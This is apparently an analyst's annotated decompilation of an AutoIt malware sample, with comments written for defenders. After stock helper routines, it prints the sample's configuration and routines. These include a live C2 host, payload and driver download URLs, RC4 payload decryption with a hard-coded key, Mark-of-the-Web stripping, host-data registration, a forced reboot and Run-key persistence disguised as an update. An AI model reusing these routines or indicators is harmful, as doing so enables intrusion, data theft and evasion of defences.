| 2930$tagnmrebar = $tagnmhdr & ";dword dwMask;uint uBand;uint fStyle;uint wID;lparam lParam" | |
| 2930$tagnmrebarchevron = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;" & $tagrect & ";lparam lParamNM" | |
| 2930$tagnmrebarchildsize = $tagnmhdr & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct" | |
| 2930$tagcolorscheme = "dword Size;dword BtnHighlight;dword BtnShadow" | |
| 2930$tagnmtoolbar = $tagnmhdr & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $tagrect | |
| 2930$tagnmtbhotitem = $tagnmhdr & ";int idOld;int idNew;dword dwFlags" | |
| 2930$tagtbbutton = "int Bitmap;int Command;byte State;byte Style;dword_ptr Param;int_ptr String" | |
| 2930$tagtbbuttoninfo = "uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax" | |
| 2930$tagnetresource = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider" | |
| 2930$tagoverlapped = "ulong_ptr Internal;ulong_ptr InternalHigh;struct;dword Offset;dword OffsetHigh;endstruct;handle hEvent" | |
| 2930$tagopenfilename = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx" | |
| 2930$tagbitmapinfoheader = "struct;dword biSize;long biWidth;long biHeight;word biPlanes;word biBitCount;" & "dword biCompression;dword biSizeImage;long biXPelsPerMeter;long biYPelsPerMeter;dword biClrUsed;dword biClrImportant;endstruct" | |
| 2930$tagbitmapinfo = $tagbitmapinfoheader & ";dword biRGBQuad[1]" | |
| 2930$tagblendfunction = "byte Op;byte Flags;byte Alpha;byte Format" | |
| 2930$tagguid = "struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct" | |
| 2930$tagwindowplacement = "uint length;uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]" | |
| 2930$tagwindowpos = "hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags" | |
| 2930$tagscrollinfo = "uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos" | |
| 2930$tagscrollbarinfo = "dword cbSize;" & $tagrect & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]" | |
| 2930$taglogfont = "struct;long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32];endstruct" | |
| 2930$tagkbdllhookstruct = "dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo" | |
| 2930$tagprocess_information = "handle hProcess;handle hThread;dword ProcessID;dword ThreadID" | |
| 2930$tagstartupinfo = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError" | |
| 2930$tagsecurity_attributes = "dword Length;ptr Descriptor;bool InheritHandle" | |
| 2930$tagwin32_find_data = "dword dwFileAttributes;dword ftCreationTime[2];dword ftLastAccessTime[2];dword ftLastWriteTime[2];dword nFileSizeHigh;dword nFileSizeLow;dword dwReserved0;dword dwReserved1;wchar cFileName[260];wchar cAlternateFileName[14]" | |
| 2930$tagtextmetric = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet" | |
| 2930$__miscconstant_cc_anycolor = 256 | |
| 2930$__miscconstant_cc_fullopen = 2 | |
| 2930$__miscconstant_cc_rgbinit = 1 | |
| 2930$tagchoosecolor = "dword Size;hwnd hWndOwnder;handle hInstance;dword rgbResult;ptr CustColors;dword Flags;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName" | |
| 2930$tagchoosefont = "dword Size;hwnd hWndOwner;handle hDC;ptr LogFont;int PointSize;dword Flags;dword rgbColors;lparam CustData;" & "ptr fnHook;ptr TemplateName;handle hInstance;ptr szStyle;word FontType;int SizeMin;int SizeMax" | |
| ; _choosecolor: fills a struct built from $tagchoosecolor and calls ChooseColor in comdlg32.dll, | |
| ; then returns the picked colour in the format selected by $ireturntype. | |
| ; Numeric prefixes are decompiler tokens, not AutoIt source. From usage, 32/33 look like Func/EndFunc, | |
| ; 34 Return, 28 Local, 4/5/6/7/8 If/Then/Else/ElseIf/EndIf, 58 a DLL call, 65/66/69 struct create/get/set | |
| ; and 287 an error-setting return helper -- inferred from context, TODO confirm against a token table. | |
| ; NOTE(review): looks like stock AutoIt UDF code bundled into the script, not sample-specific logic -- confirm. | |
| 32_choosecolor($ireturntype = 0, $icolorref = 0, $ireftype = 0, $hwndownder = 0) | |
| 28$tagcustcolors = "dword[16]" | |
| 28$tchoose = 65($tagchoosecolor) | |
| 28$tcc = 65($tagcustcolors) | |
| ; Normalise the caller-supplied initial colour according to $ireftype (1 or 2). | |
| 4$ireftype = 15 | |
| $icolorref = 217($icolorref) | |
| 7$ireftype = 25 | |
| $icolorref = 199(306($icolorref), 6) | |
| $icolorref = "0x" & 325($icolorref, 5, 2) & 325($icolorref, 3, 2) & 325($icolorref, 1, 2) | |
| 8 | |
| 69($tchoose, "Size", 68($tchoose)) | |
| 69($tchoose, "hWndOwnder", $hwndownder) | |
| 69($tchoose, "rgbResult", $icolorref) | |
| 69($tchoose, "CustColors", 67($tcc)) | |
| 69($tchoose, "Flags", 19($__miscconstant_cc_anycolor, $__miscconstant_cc_fullopen, $__miscconstant_cc_rgbinit)) | |
| 28$aresult = 58("comdlg32.dll", "bool", "ChooseColor", "struct*", $tchoose) | |
| ; Both failure paths return -1: first when the call itself errors, then when the API result is 0. | |
| 4@error534287(@error, @extended, -1) | |
| 4$aresult[0] = 0534287(-3, -3, -1) | |
| 28$scolor_picked = 66($tchoose, "rgbResult") | |
| ; $ireturntype 1 and 2 return "0x"-prefixed hex strings (2 reorders the byte pairs); 0 returns the raw value. | |
| 4$ireturntype = 15 | |
| 34"0x" & 199(306($scolor_picked), 6) | |
| 7$ireturntype = 25 | |
| $scolor_picked = 199(306($scolor_picked), 6) | |
| 34"0x" & 325($scolor_picked, 5, 2) & 325($scolor_picked, 3, 2) & 325($scolor_picked, 1, 2) | |
| 7$ireturntype = 05 | |
| 34$scolor_picked | |
| 6 | |
| 34287(-4, -4, -1) | |
| 8 | |
| 33 | |
| ; _choosefont: fills structs built from $tagchoosefont and $taglogfont, calls ChooseFontW in comdlg32.dll | |
| ; and returns the selection as a comma-split array (attributes, face name, size, weight, colour forms). | |
| ; Token meanings (58 DLL call, 65/66/69 struct create/get/set, 19 bitwise OR, 331 string split) are | |
| ; inferred from argument shapes -- TODO confirm. | |
| ; NOTE(review): looks like stock AutoIt UDF code rather than sample-specific logic -- confirm. | |
| 32_choosefont($sfontname = "Courier New", $ipointsize = 10, $ifontcolorref = 0, $ifontweight = 0, $bitalic = 40, $bunderline = 40, $bstrikethru = 40, $hwndowner = 0) | |
| 28$iitalic = 0, $iunderline = 0, $istrikeout = 0 | |
| ; Reorders the three colour bytes of $ifontcolorref using mask-and-shift operations. | |
| $ifontcolorref = 19(21(17($ifontcolorref, 255), -16), 17($ifontcolorref, 65280), 21(17($ifontcolorref, 16711680), 16)) | |
| ; Converts the point size to a height using the device-caps value for $logpixelsx and a divisor of 72. | |
| 28$hdc = __misc_getdc(0) | |
| 28$iheight = 280(($ipointsize * __misc_getdevicecaps($hdc, $logpixelsx)) / 72, 0) | |
| __misc_releasedc(0, $hdc) | |
| 28$tchoosefont = 65($tagchoosefont) | |
| 28$tlogfont = 65($taglogfont) | |
| 69($tchoosefont, "Size", 68($tchoosefont)) | |
| 69($tchoosefont, "hWndOwner", $hwndowner) | |
| 69($tchoosefont, "LogFont", 67($tlogfont)) | |
| 69($tchoosefont, "PointSize", $ipointsize) | |
| 69($tchoosefont, "Flags", 19($cf_screenfonts, $cf_printerfonts, $cf_effects, $cf_inittologfontstruct, $cf_noscriptsel)) | |
| 69($tchoosefont, "rgbColors", $ifontcolorref) | |
| 69($tchoosefont, "FontType", 0) | |
| 69($tlogfont, "Height", $iheight) | |
| 69($tlogfont, "Weight", $ifontweight) | |
| 69($tlogfont, "Italic", $bitalic) | |
| 69($tlogfont, "Underline", $bunderline) | |
| 69($tlogfont, "Strikeout", $bstrikethru) | |
| 69($tlogfont, "FaceName", $sfontname) | |
| 28$aresult = 58("comdlg32.dll", "bool", "ChooseFontW", "struct*", $tchoosefont) | |
| 4@error534287(@error, @extended, -1) | |
| 4$aresult[0] = 0534287(-3, -3, -1) | |
| 28$sfacename = 66($tlogfont, "FaceName") | |
| ; Falls back to the requested font name when the dialog returned an empty face name. | |
| 4323($sfacename) = 01323($sfontname) > 05$sfacename = $sfontname | |
| 466($tlogfont, "Italic")5$iitalic = 2 | |
| 466($tlogfont, "Underline")5$iunderline = 4 | |
| 466($tlogfont, "Strikeout")5$istrikeout = 8 | |
| 28$iattributes = 19($iitalic, $iunderline, $istrikeout) | |
| 28$isize = 66($tchoosefont, "PointSize") / 10 | |
| 28$icolorref = 66($tchoosefont, "rgbColors") | |
| 28$iweight = 66($tlogfont, "Weight") | |
| 28$scolor_picked = 199(306($icolorref), 6) | |
| 34331($iattributes & "," & $sfacename & "," & $isize & "," & $iweight & "," & $icolorref & "," & "0x" & $scolor_picked & "," & "0x" & 325($scolor_picked, 5, 2) & 325($scolor_picked, 3, 2) & 325($scolor_picked, 1, 2), ",") | |
| 33 | |
| ; _clipputfile: places a delimiter-separated list of file paths on the clipboard as format 15 ($cf_hdrop). | |
| ; Sequence: OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, fill a drop-files style struct, | |
| ; SetClipboardData, then GlobalUnlock / GlobalFree on the failure paths and CloseClipboard at the end. | |
| ; $ierror records which step failed (2..9) and $ilasterror the matching _winapi_getlasterror() value. | |
| ; NOTE(review): looks like stock AutoIt UDF code; no call to it is visible in this part of the file. | |
| 32_clipputfile($sfilepath, $sdelimiter = "|") | |
| 2830$gmem_moveable = 2, $cf_hdrop = 15 | |
| ; Two trailing delimiters are appended; the loop below turns every delimiter into a zero character. | |
| $sfilepath &= $sdelimiter & $sdelimiter | |
| 28$nglobmemsize = 2 * (323($sfilepath) + 20) | |
| 28$aresult = 58("user32.dll", "bool", "OpenClipboard", "hwnd", 0) | |
| 4@error2$aresult[0] = 0534287(1, _winapi_getlasterror(), 40) | |
| 28$ierror = 0, $ilasterror = 0 | |
| $aresult = 58("user32.dll", "bool", "EmptyClipboard") | |
| 4@error23$aresult[0]5 | |
| $ierror = 2 | |
| $ilasterror = _winapi_getlasterror() | |
| 6 | |
| $aresult = 58("kernel32.dll", "handle", "GlobalAlloc", "uint", $gmem_moveable, "ulong_ptr", $nglobmemsize) | |
| 4@error23$aresult[0]5 | |
| $ierror = 3 | |
| $ilasterror = _winapi_getlasterror() | |
| 6 | |
| 28$hglobal = $aresult[0] | |
| $aresult = 58("kernel32.dll", "ptr", "GlobalLock", "handle", $hglobal) | |
| 4@error23$aresult[0]5 | |
| $ierror = 4 | |
| $ilasterror = _winapi_getlasterror() | |
| 6 | |
| 28$hlock = $aresult[0] | |
| ; The struct is created over the locked memory ($hlock) and sized from the path string length. | |
| 28$tdropfiles = 65("dword pFiles;" & $tagpoint & ";bool fNC;bool fWide;wchar[" & 323($sfilepath) + 1 & "]", $hlock) | |
| 4@error534287(5, 6, 40) | |
| 28$tstruct = 65("dword;long;long;bool;bool") | |
| 69($tdropfiles, "pFiles", 68($tstruct)) | |
| 69($tdropfiles, "X", 0) | |
| 69($tdropfiles, "Y", 0) | |
| 69($tdropfiles, "fNC", 0) | |
| 69($tdropfiles, "fWide", 1) | |
| 69($tdropfiles, 6, $sfilepath) | |
| 13$i = 115323($sfilepath) | |
| 466($tdropfiles, 6, $i) = $sdelimiter569($tdropfiles, 6, 28(0), $i) | |
| 14 | |
| $aresult = 58("user32.dll", "handle", "SetClipboardData", "uint", $cf_hdrop, "handle", $hglobal) | |
| 4@error23$aresult[0]5 | |
| $ierror = 6 | |
| $ilasterror = _winapi_getlasterror() | |
| 8 | |
| $aresult = 58("kernel32.dll", "bool", "GlobalUnlock", "handle", $hglobal) | |
| 4(@error23$aresult[0])13$ierror1_winapi_getlasterror()5 | |
| $ierror = 8 | |
| $ilasterror = _winapi_getlasterror() | |
| 8 | |
| 8 | |
| $aresult = 58("kernel32.dll", "ptr", "GlobalFree", "handle", $hglobal) | |
| 4(@error2$aresult[0])13$ierror5 | |
| $ierror = 9 | |
| $ilasterror = _winapi_getlasterror() | |
| 8 | |
| 8 | |
| 8 | |
| $aresult = 58("user32.dll", "bool", "CloseClipboard") | |
| 4(@error23$aresult[0])13$ierror534287(7, _winapi_getlasterror(), 40) | |
| 4$ierror534287($ierror, $ilasterror, 40) | |
| 3439 | |
| 33 | |
| ; _mousetrap: calls ClipCursor in user32.dll. With no parameters it passes a null pointer; otherwise it | |
| ; passes a rectangle built from the four arguments (with two arguments, right/bottom become left+1/top+1). | |
| ; Returns 39 on success (39 is presumably True); 287(...) is the error-return path -- inferred. | |
| ; NOTE(review): looks like stock AutoIt UDF code; no call to it is visible in this part of the file. | |
| 32_mousetrap($ileft = 0, $itop = 0, $iright = 0, $ibottom = 0) | |
| 28$areturn = 0 | |
| ; 41 is presumably the Default keyword: arguments passed as Default are reset to 0. | |
| 4$ileft = 415$ileft = 0 | |
| 4$itop = 415$itop = 0 | |
| 4$iright = 415$iright = 0 | |
| 4$ibottom = 415$ibottom = 0 | |
| 4@NumParams = 05 | |
| $areturn = 58("user32.dll", "bool", "ClipCursor", "ptr", 0) | |
| 4@error23$areturn[0]534287(1, _winapi_getlasterror(), 40) | |
| 6 | |
| 4@NumParams = 25 | |
| $iright = $ileft + 1 | |
| $ibottom = $itop + 1 | |
| 8 | |
| 28$trect = 65($tagrect) | |
| 69($trect, "Left", $ileft) | |
| 69($trect, "Top", $itop) | |
| 69($trect, "Right", $iright) | |
| 69($trect, "Bottom", $ibottom) | |
| $areturn = 58("user32.dll", "bool", "ClipCursor", "struct*", $trect) | |
| 4@error23$areturn[0]534287(2, _winapi_getlasterror(), 40) | |
| 8 | |
| 3439 | |
| 33 | |
| ; _singleton: single-instance guard built on a named mutex (CreateMutexW with $soccurrencename). | |
| ; Returns the mutex handle when the name was free. When GetLastError reports 183 ($error_already_exists): | |
| ;   - $iflag bit 1 set: closes the handle and returns 0 with the error code set via 287(...) | |
| ;   - otherwise: "35 - 1" (35 is presumably Exit, i.e. terminate with code -1). | |
| ; $iflag bit 2 set: builds a security descriptor whose DACL is marked present with a null pointer and | |
| ; passes it to CreateMutexW, so the mutex is created without an access-restricting DACL. | |
| ; Analyst note: the mutex name is chosen by the caller; the top-level code in this file passes "huebr", | |
| ; which makes that named object a usable host indicator for a running instance. | |
| 32_singleton($soccurrencename, $iflag = 0) | |
| 2830$error_already_exists = 183 | |
| 2830$security_descriptor_revision = 1 | |
| 28$tsecurityattributes = 0 | |
| 417($iflag, 2)5 | |
| 28$tsecuritydescriptor = 65("byte;byte;word;ptr[4]") | |
| 28$aret = 58("advapi32.dll", "bool", "InitializeSecurityDescriptor", "struct*", $tsecuritydescriptor, "dword", $security_descriptor_revision) | |
| 4@error534287(@error, @extended, 0) | |
| 4$aret[0]5 | |
| $aret = 58("advapi32.dll", "bool", "SetSecurityDescriptorDacl", "struct*", $tsecuritydescriptor, "bool", 1, "ptr", 0, "bool", 0) | |
| 4@error534287(@error, @extended, 0) | |
| 4$aret[0]5 | |
| $tsecurityattributes = 65($tagsecurity_attributes) | |
| 69($tsecurityattributes, 1, 68($tsecurityattributes)) | |
| 69($tsecurityattributes, 2, 67($tsecuritydescriptor)) | |
| 69($tsecurityattributes, 3, 0) | |
| 8 | |
| 8 | |
| 8 | |
| 28$ahandle = 58("kernel32.dll", "handle", "CreateMutexW", "struct*", $tsecurityattributes, "bool", 1, "wstr", $soccurrencename) | |
| 4@error534287(@error, @extended, 0) | |
| ; GetLastError is read through a second DLL call immediately after CreateMutexW. | |
| 28$alasterror = 58("kernel32.dll", "dword", "GetLastError") | |
| 4@error534287(@error, @extended, 0) | |
| 4$alasterror[0] = $error_already_exists5 | |
| 417($iflag, 1)5 | |
| 58("kernel32.dll", "bool", "CloseHandle", "handle", $ahandle[0]) | |
| 4@error534287(@error, @extended, 0) | |
| 34287($alasterror[0], $alasterror[0], 0) | |
| 6 | |
| 35 - 1 | |
| 8 | |
| 8 | |
| 34$ahandle[0] | |
| 33 | |
| ; _ispressed: calls GetAsyncKeyState in $vdll for the virtual-key code "0x" & $shexkey and returns | |
| ; whether bit 32768 (0x8000) of the result is set; returns 40 (presumably False) if the call errors. | |
| ; NOTE(review): looks like stock AutoIt UDF code; no call to it is visible in this part of the file, | |
| ; so its presence alone does not show key-state polling by the sample -- check the rest of the dump. | |
| 32_ispressed($shexkey, $vdll = "user32.dll") | |
| 28$areturn = 58($vdll, "short", "GetAsyncKeyState", "int", "0x" & $shexkey) | |
| 4@error534287(@error, @extended, 40) | |
| 3417($areturn[0], 32768) <> 0 | |
| 33 | |
| ; _versioncompare: compares two version strings part by part after splitting on "." and ",". | |
| ; Returns 0 when the strings are equal; otherwise 1 or -1 through 288(mode, result), where the first | |
| ; argument (1, 2 or 3) records which comparison decided: plain, numeric (250(...)), or trailing sub-version. | |
| ; The shorter part list is padded with "0" entries before comparing. | |
| ; Token meanings (331 split, 369 array size, 27 resize, 313/315 character-class tests, 0(...) absolute | |
| ; value) are inferred from usage -- TODO confirm. | |
| ; NOTE(review): looks like stock AutoIt UDF code rather than sample-specific logic -- confirm. | |
| 32_versioncompare($sversion1, $sversion2) | |
| 4$sversion1 = $sversion25340 | |
| 28$ssubversion1 = "", $ssubversion2 = "" | |
| ; A trailing character that passes the 313(...) test is split off as the sub-version of each input. | |
| 4313(330($sversion1, 1))5 | |
| $ssubversion1 = 330($sversion1, 1) | |
| $sversion1 = 337($sversion1, 1) | |
| 8 | |
| 4313(330($sversion2, 1))5 | |
| $ssubversion2 = 330($sversion2, 1) | |
| $sversion2 = 337($sversion2, 1) | |
| 8 | |
| 28$aversion1 = 331($sversion1, ".,"), $aversion2 = 331($sversion2, ".,") | |
| 28$ipartdifference = ($aversion1[0] - $aversion2[0]) | |
| 4$ipartdifference < 05 | |
| 27$aversion1[369($aversion2)] | |
| $aversion1[0] = 369($aversion1) - 1 | |
| 13$i = (369($aversion1) - 0($ipartdifference))15$aversion1[0] | |
| $aversion1[$i] = "0" | |
| 14 | |
| 7$ipartdifference > 05 | |
| 27$aversion2[369($aversion1)] | |
| $aversion2[0] = 369($aversion2) - 1 | |
| 13$i = (369($aversion2) - 0($ipartdifference))15$aversion2[0] | |
| $aversion2[$i] = "0" | |
| 14 | |
| 8 | |
| 13$i = 115$aversion1[0] | |
| 4315($aversion1[$i])1315($aversion2[$i])5 | |
| 4250($aversion1[$i]) > 250($aversion2[$i])5 | |
| 34288(2, 1) | |
| 7250($aversion1[$i]) < 250($aversion2[$i])5 | |
| 34288(2, -1) | |
| 7$i = $aversion1[0]5 | |
| 4$ssubversion1 > $ssubversion25 | |
| 34288(3, 1) | |
| 7$ssubversion1 < $ssubversion25 | |
| 34288(3, -1) | |
| 8 | |
| 8 | |
| 6 | |
| 4$aversion1[$i] > $aversion2[$i]5 | |
| 34288(1, 1) | |
| 7$aversion1[$i] < $aversion2[$i]5 | |
| 34288(1, -1) | |
| 8 | |
| 8 | |
| 14 | |
| 34288(0($ipartdifference), 0) | |
| 33 | |
| ; __misc_getdc: calls GetDC in user32.dll for $hwnd and returns the handle from the call result. | |
| ; On a call error or a zero result it returns 0 with the error set to 1 and _winapi_getlasterror() as extended. | |
| 32__misc_getdc($hwnd) | |
| 28$aresult = 58("user32.dll", "handle", "GetDC", "hwnd", $hwnd) | |
| 4@error23$aresult[0]534287(1, _winapi_getlasterror(), 0) | |
| 34$aresult[0] | |
| 33 | |
| ; __misc_getdevicecaps: calls GetDeviceCaps in gdi32.dll for ($hdc, $iindex) and returns its integer result; | |
| ; returns 0 with @error/@extended propagated when the call itself fails. | |
| 32__misc_getdevicecaps($hdc, $iindex) | |
| 28$aresult = 58("gdi32.dll", "int", "GetDeviceCaps", "handle", $hdc, "int", $iindex) | |
| 4@error534287(@error, @extended, 0) | |
| 34$aresult[0] | |
| 33 | |
| ; __misc_releasedc: calls ReleaseDC in user32.dll for ($hwnd, $hdc) and returns whether the result is non-zero; | |
| ; returns 40 (presumably False) with @error/@extended propagated when the call itself fails. | |
| 32__misc_releasedc($hwnd, $hdc) | |
| 28$aresult = 58("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc) | |
| 4@error534287(@error, @extended, 40) | |
| 34$aresult[0] <> 0 | |
| 33 | |
| ; Sample configuration (script-level variables). 29 is presumably the Global keyword token and 39/40 | |
| ; True/False -- inferred from how $bpersistence, $ba3x and $busestartupfolder are tested further down. | |
| ; $ba3x: tested by installself() and _main() as "running interpreted" (per their debuglog strings). | |
| 29$ba3x = 40 | |
| ; $sserver:$iport is the endpoint registermachine() connects to. | |
| 29$iport = 443 | |
| 29$bpersistence = 39 | |
| ; Install location is the root of the user profile; payload files are written directly into it. | |
| 29$sinstalldir = @HomeDrive & @HomePath | |
| 29$stempdir = @TempDir | |
| 29$busestartupfolder = 40 | |
| 29$sserver = "port2010kmjutre.camdvr.org" | |
| ; $scounterurl is requested by _main() with user name, machine name, OS version, architecture and build. | |
| 29$scounterurl = "https://test.discoverthings.pw/counter4.php" | |
| ; 274(0, 32767, 1) is evaluated at run time and becomes the left-most host label (274 is presumably Random), | |
| ; so the payload host name differs per run. Match on the parent domain and the /X86.rc4 and /X64.rc4 paths | |
| ; rather than on a fixed FQDN. Note the payload URLs use plain http. | |
| 29$sx86 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X86.rc4" | |
| 29$sx64 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X64.rc4" | |
| ; Driver DLLs and the driver installer are fetched from file-sharing links (used by installdriver()). | |
| 29$sdriverx86 = "https://drive.google.com/uc?authuser=0&id=1Sa-NOdSof4FcUQbUH8V9pq9URtkYnB5h&export=download" | |
| 29$sdriverx64 = "https://drive.google.com/uc?authuser=0&id=11iWhfhV4c49pWabl9EDcACxzXnrHU7NM&export=download" | |
| 29$sdriverinstaller = "https://drive.google.com/uc?authuser=0&id=1LgBlbz4opeHnm7NflOxUu2XUag0h1aQD&export=download" | |
| ; Build number sent in both the counter request and the registration message. | |
| 29$ibuildver = 106 | |
| 29$sbin, $sdriver | |
| ; The x86 URLs are assigned unconditionally; no use of $sx64 / $sdriverx64 is visible in this part of the file. | |
| $sbin = $sx86 | |
| $sdriver = $sdriverx86 | |
| ; 258 is presumably Opt(): sets the "TCPTimeout" option to 30000. | |
| 258("TCPTimeout", 30000) | |
| ; installfiles: fetches the encrypted payload and decrypts it on disk. | |
| ;   1. 205($sbin, ...) saves $sbin to <installdir>\datastorage.tmp (205 is presumably a download call). | |
| ;   2. _crypt_decryptfile(...) writes <installdir>\datastorage.bin using a hard-coded password and $calg_rc4. | |
| ;   3. 94(...) removes the .tmp file (94 is presumably a file delete). | |
| ;   4. The last line runs the command interpreter to redirect "echo." into the ":Zone.Identifier" alternate | |
| ;      data stream of datastorage.bin; the stream name is split into fragments in the script. Overwriting | |
| ;      that stream replaces any Mark-of-the-Web zone data on the file. | |
| ; Defender notes: datastorage.tmp / datastorage.bin in the profile root are file indicators; a cmd.exe | |
| ; command line that redirects into a ":Zone.Identifier" stream is a behavioural one. _main() later passes | |
| ; datastorage.bin to 64(...) and logs "Instancing module", so the decrypted file is treated as a loadable module. | |
| 32installfiles() | |
| _crypt_startup() | |
| debuglog("Downloading datastorage.tmp") | |
| 205($sbin, $sinstalldir & "\datastorage.tmp") | |
| debuglog("Decrypting datastorage") | |
| _crypt_decryptfile($sinstalldir & "\datastorage.tmp", $sinstalldir & "\datastorage.bin", "penis", $calg_rc4) | |
| 94($sinstalldir & "\datastorage.tmp") | |
| _crypt_shutdown() | |
| 284(@ComSpec & " /C echo. > " & $sinstalldir & "\datastorage.bin:Zo" & "ne." & "Iden" & "tifier") | |
| 33 | |
| ; registermachine: opens a TCP connection to $sserver:$iport and sends one registration message. | |
| ; Token meanings are inferred from argument shapes: 348/347 TCP start-up/shutdown, 344 name resolution, | |
| ; 342 connect, 346 send, 341 close, 293 sleep, 214 INI write, and 33(...) as a function token looks like | |
| ; console output -- TODO confirm. | |
| ; Message layout, fields separated by "<=|=>": | |
| ;   REG | user@computer | build number | OS version | OS architecture | "Registrando..." + three CRLFs | |
| ; The string is passed to the send call as-is; no TLS set-up is visible in this function even though | |
| ; $iport is 443, so the "REG<=|=>" prefix and the delimiter are candidates for a network signature. | |
| ; After the connection attempt (successful or not) the server name and port are written to | |
| ; %AppData%\bfstt.dat, section "tcp", keys "svr" and "port" -- a host indicator. | |
| 32registermachine() | |
| 348() | |
| $hsocket = 342(344($sserver), $iport) | |
| 33("Socket: " & $hsocket & "(" & @error & ")") | |
| 4$hsocket5 | |
| debuglog("Server is visible right now") | |
| 346($hsocket, "REG<=|=>" & @UserName & "@" & @ComputerName & "<=|=>" & $ibuildver & "<=|=>" & @OSVersion & "<=|=>" & @OSArch & "<=|=>Registrando..." & @CRLF & @CRLF & @CRLF) | |
| 33("Error: " & @error) | |
| 293(2000) | |
| 341($hsocket) | |
| 6 | |
| debuglog("Server is not visible right now") | |
| 8 | |
| 347() | |
| 214(@AppDataDir & "\bfstt.dat", "tcp", "svr", $sserver) | |
| 214(@AppDataDir & "\bfstt.dat", "tcp", "port", $iport) | |
| 33 | |
| ; installdriver: downloads a driver installer and DLL, runs the installer, then restarts the machine. | |
| ;   - $sdriverinstaller -> <temp>\install-interception.exe, $sdriver -> <Windows dir>\interception.dll | |
| ;     (205 is presumably a download call). | |
| ;   - Both files get their ":Zone.Identifier" stream overwritten through the command interpreter, | |
| ;     with the stream name split into string fragments. | |
| ;   - 290(..., "/install") runs the installer (presumably run-and-wait); 291(2 + 4 + 16) follows the | |
| ;     "Restarting machine" log string, so 291 is presumably a shutdown call with reboot/force flags. | |
| ; NOTE(review): the file names match the naming of the Interception input-filter driver's installer -- | |
| ; presumed, confirm by hashing the downloaded files. | |
| ; Reached only from the "--drvinst" branch of the top-level code, which _main() launches with the | |
| ; "runas" verb. Defender notes: creation of interception.dll in the Windows directory, execution of | |
| ; install-interception.exe from a temp directory, and a forced reboot shortly after are the observable events. | |
| 32installdriver() | |
| debuglog("Downloading driver files") | |
| 205($sdriverinstaller, $stempdir & "\install-interception.exe") | |
| 205($sdriver, @WindowsDir & "\interception.dll") | |
| debuglog("Installing driver") | |
| 284(@ComSpec & ' /C echo. > "' & $stempdir & '\install-interception.exe":Z' & "one" & ".Ident" & "ifier") | |
| 284(@ComSpec & ' /C echo. > "' & @WindowsDir & '\interception.dll":Zo' & "ne" & ".Ident" & "ifier") | |
| 290($stempdir & "\install-interception.exe", "/install") | |
| debuglog("Restarting machine") | |
| 291(2 + 4 + 16) | |
| 33 | |
| ; installself: copies the sample into $sinstalldir and registers it to start at logon. | |
| ; Runs only when persistence is enabled and the script is not already <installdir>\inter.exe. | |
| ; Four variants, selected by $ba3x (interpreted) and $busestartupfolder: | |
| ;   interpreted + registry : interpreter copied to inter.exe, script to userconf.dat, Run value added | |
| ;   interpreted + startup  : same copies, auto.vbs written, auto.lnk created in the Startup folder | |
| ;   compiled + startup     : auto.vbs written, auto.lnk created in the Startup folder | |
| ;   compiled + registry    : script copied to inter.exe, Run value added | |
| ; With the values set earlier in this file ($ba3x and $busestartupfolder both 40, presumably False) | |
| ; the last variant is the one that applies. | |
| ; Persistence artefacts to look for: | |
| ;   - HKCU ...\CurrentVersion\Run value "KB2823324" (a name shaped like a Windows update ID) pointing at inter.exe | |
| ;   - <installdir>\inter.exe, userconf.dat, auto.vbs and <Startup>\auto.lnk | |
| ; The registry path and value name are split into fragments inside the script, which defeats plain string | |
| ; matching on the file; the reassembled "reg add" command line is still visible in process-creation logs. | |
| ; Token meanings (91 file copy, 281 run, 110/124/90 file open/write line/close, 93 create shortcut) are | |
| ; inferred from arguments -- TODO confirm. | |
| 32installself() | |
| 4(@ScriptDir <> $sinstalldir2@ScriptName <> "inter.exe")1$bpersistence5 | |
| 4$ba3x5 | |
| 4basename(@AutoItExe) <> "inter.exe"591(@AutoItExe, $sinstalldir & "\inter.exe", 1) | |
| 91(@ScriptFullPath, $sinstalldir & "\userconf.dat", 1) | |
| 43$busestartupfolder5 | |
| debuglog("Setting as startup through registry - interpreted") | |
